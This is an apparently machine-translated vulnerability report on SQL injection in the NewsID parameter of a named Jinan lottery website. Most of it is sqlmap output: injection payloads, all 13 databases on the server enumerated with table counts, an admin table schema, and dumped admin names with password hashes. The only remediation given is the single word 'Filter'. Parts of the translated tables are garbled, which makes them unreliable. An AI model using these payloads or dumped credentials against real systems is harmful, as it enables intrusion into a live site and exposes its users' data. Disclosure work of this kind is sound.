Jinan Fu Cai net has SQL injection. Cause leakage of other databases

Jinan Fu Cai net has SQL injection. Cause leakage of other databases

Last time it was Guangdong de.
This time, the account has no money to decrypt the token 5. Boring background

Jinan Fu caiwang

Http://www.jnscp.cn/

Http://www.jnscp.cn/detailNews.jsp? Newsid= 2645 (GET)
 

sqlmap identified the following injection points with a total of 88 HTTP(s) requests:---Parameter: NewsID (GET)    Type: UNION query    Title: MySQL UNION query (NULL) - 19 columns    Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND time-based blind    Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsID (GET)    Type: UNION query    Title: MySQL UNION query (NULL) - 19 columns    Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND time-based blind    Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11available databases [13]:[*] caipiaodata[*] examine[*] information_schema[*] jiaoyou[*] jiuxiang[*] jnsz[*] kptest[*] mysql[*] test[*] test2[*] wenliandata[*] yyzyhj[*] zldb

Multiple databases

Only [*] caipiaodata

Is the website

Other Websites

What other websites do I know?

Database: zldb + tables + --------- + | Table | Entries | + ------------------------------------- + --------- + | news | 52 | pic | 8 | news_kind | 4 | 'user' | 1 | + hour --------------------------------------- + --------- + Database: wenliandata + tables + --------- + | Table | Entries | + --------------------------------------- + --------- + | log | 6797 | news | 1288 | specnews | 53 | bigclass | 39 | smallclass | 10 | specclass | 2 | admin | 1 | config | 1 | + --------------------------------------- + --------- + Database: jiuxiang + tables + --------- + | Table | Entries | + tables + --------- + | shop_area | 3162 | shop_city | 345 | shop_role_menu | 58 | shop_menu | 40 | shop_goods_attribute | 39 | shop_goods_category | 36 | shop_goods | 35 | shop_province | 34 | shop_order_goods | 32 | shop_order | 29 | shop_user | 21 | shop_user_detail | 21 | shop_image | 17 | shop_image_type | 15 | shop_category | 13 | shop_category_big | 13 | metrics | 11 | shop_goods_comm | 8 | shop_info_type | 7 | shop_paytype | 5 | sys_param | 5 | role | 4 | shop_role | 4 | shop_ask | 3 | shop_brand | 3 | shop_delivery | 3 | shop_goodscart | 3 | shop_model_attribute | 3 | shop_user_grad | 3 | shop_admin | 2 | shop_categorybig | 2 | shop_favorite | 2 | shop_info | 1 | shop_model | 1 | shop_provider | 1 | shop_store_in | 1 | shop_store_in_detail | 1 | system_param | 1 | + --------------------------------------- + --------- + Database: jnsz + keys + --------- + | Table | Entries | + keys + --------- + | enterprisedata | 496 | enterpriseinfo | 410 | sys_menu_role | 320 | sys_data_role | 62 | sys_dictionary | 54 | sys_menu | 35 | sys_userrole | 26 | sys_user | 22 | sys_role | 21 | sys_organization | 18 | sys_icon | 4 | sys_organizationrole | 4 | sys_userposition | 2 | sys_position | 1 | sys_positionrole | 1 | + --------------------------------------- + --------- + Database: jiaoyou + ----------------------------------- + --------- + | Table | Entries | + hour + --------- + | hyly | 23883 | log | 8276 | yyhy | 1519 | zxhy | 1056 | users | 857 | news | 277 | ykreg | 256 | eventregistration | 114 | links | 66 | hzhb | 57 | hyarea | 17 | yyvideo | 10 | bigclass | 9 | blinddates | 6 | yytype | 6 | alipay | 5 | paytype | 5 | message | 4 | admin | 1 | config | 1 | + --------------------------------- + --------- + Database: yyzyhj + ----------------------------------- + --------- + | Table | Entries | + hour + --------- + | hyly | 15829 | log | 7746 | yyhy | 1260 | zxhy | 1036 | users | 840 | news | 242 | ykreg | 122 | eventregistration | 114 | hzhb | 57 | links | 35 | hyarea | 17 | yyvideo | 10 | bigclass | 9 | alipay | 6 | blinddates | 6 | yytype | 6 | paytype | 5 | message | 4 | admin | 1 | config | 1 | + --------------------------------- + --------- + Database: examine + records + --------- + | Table | Entries | + records + --------- + | t_examineevaluate | 330771 | t_examinescore | 31955 | t_examineperson | 13068 | employee | 1287 | department | 168 | t_examinepublish | 91 | t_examinecontenta | 39 | t_examinecontent | 16 | unit | 12 | t_employeetype | 8 | employee_old | 7 | t_examinetable | 7 | 'position' | 5 | t_examineindex | 5 | t_examinetype | 3 | admin | 2 | + --------------------------------------- + --------- + Database: information_schema + TABLES + --------- + | Table | Entries | + TABLES + --------- + | COLUMNS | 2622 | STATISTICS | 410 | KEY_COLUMN_USAGE | 219 | TABLES | 202 | TABLE_CONSTRAINTS | 195 | shards | 126 | COLLATIONS | 126 | SCHEMA_PRIVILEGES | 114 | USER_PRIVILEGES | 105 | CHARACTER_SETS | 36 | SCHEMATA | 13 | + shards + --------- + Database: mysql + metrics + --------- + | Table | Entries | + metrics + --------- + | help_relation | 724 | help_topic | 458 | help_keyword | 378 | help_category | 36 | 'user' | 9 | db | 8 | + ----------------------------------------- + --------- + Database: kptest + tables + --------- + | Table | Entries | + tables + --------- + | t_examineevaluate | 162681 | t_examineperson | 4219 | t_examinescore | 192 | t_examinecontenta | 37 | t_employeetype | | t_examinecontent | 8 | t_examinetable | 8 | employee_old | 7 | 'position' | 5 | t_examineindex | 5 | department | 3 | employee | 3 | t_examinepublish | 3 | t_examinetype | 3 | admin | 2 | unit | 1 | + --------------------------------------- + --------- + Database: caipiaodata + response + --------- + | Table | Entries | + --------------------------------------- + --------- + | log | 6497 | news | 2533 | message | 164 | bigclass | 22 | admin | 2 | config | 1 | + ------------------------------------- + --------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL)-19 columns Payload: NewsID = 2645 union all select null, NULL, CONCAT (0x71626a7671, 0x46564e66594849515267, 0x716a787071), NULL # Type: AND/OR time-based blind Title: MySQL> 5.0.11 AND time-based blind Payload: NewsID = 2645 and sleep (5) --- web application technology: JSPback-end DBMS: MySQL 5.0.11Database: kptestTable: admin [6 columns] + ---------------- + ------------- + | Column | Type | + ---------------- + ------------- + | adminId | int (4) | adminLoginIP | varchar (30) | adminLoginTime | varchar (30) | adminName | varchar (50) | adminPwd | varchar (50) | role | varchar (10) | + ---------------- + ------------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: NewsID (GET) Type: UNION query Title: mySQL UNION query (NULL)-19 columns Payload: NewsID = 2645 union all select null, NULL, NULL, CONCAT (0x71626a7671, 0x46564e66594849515267, 0x716a787071), NULL, NULL # Type: AND/OR time-based blind Title: mySQL> 5.0.11 AND time-based blind Payload: NewsID = 2645 and sleep (5) --- web application technology: JSPback-end DBMS: MySQL 5.0.11Database: kptestTable: admin [2 entries] + -------------------------------------- + ----------- + | adminPwd | adminName | + -------------------------------------- + ----------- + | quit (1) | admin | response | + ------------------------------------ + ----------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: NewsID (GET) type: UNION query Title: MySQL UNION query (NULL)-19 columns Payload: NewsID = 2645 union all select null, NULL, NULL, CONCAT (0x71626a7671, 0x46564e66594849515267, 0x716a787071), NULL, NULL # Type: AND/OR time-based blind Title: mySQL> 5.0.11 AND time-based blind Payload: NewsID = 2645 and sleep (5) --- web application technology: JSPback-end DBMS: MySQL 5.0.11Database: caipiaodataTable: admin [18 columns] + --------------- + ------------- + | Column | Type | + --------------- + ------------- + | AddTime | varchar (20) | AdminID | int (11) | AdminName | varchar (32) | AdminPwd | varchar (64) | AdminType | smallint (6) | LastLoginIP | varchar (50) | LastLoginTime | varchar (50) | LoginNum | int (11) | NewsNum | int (11) | UserAddress | varchar (80) | UserBirthday | varchar (10) | UserEmail | varchar (50) | UserInfo | longtext | UserName | varchar (20) | UserQQ | varchar (10) | UserSex | char (2) | UserTel | varchar (50) | UserZip | varchar (6) | + --------------- + ------------- +

caipiaodata

UserName, AdminPwdadmin, 31461AB060AFBB91E561047381356F5B ah, 31461AB060AFBB91E561047381356F5B

kptest

AdminPwd, adminNameC4CA4238A0B923820DCC509A6F75849B (1), admin3069C374C533AE8D7928DA242B6A9825, Zhang San

 

Solution:

Filter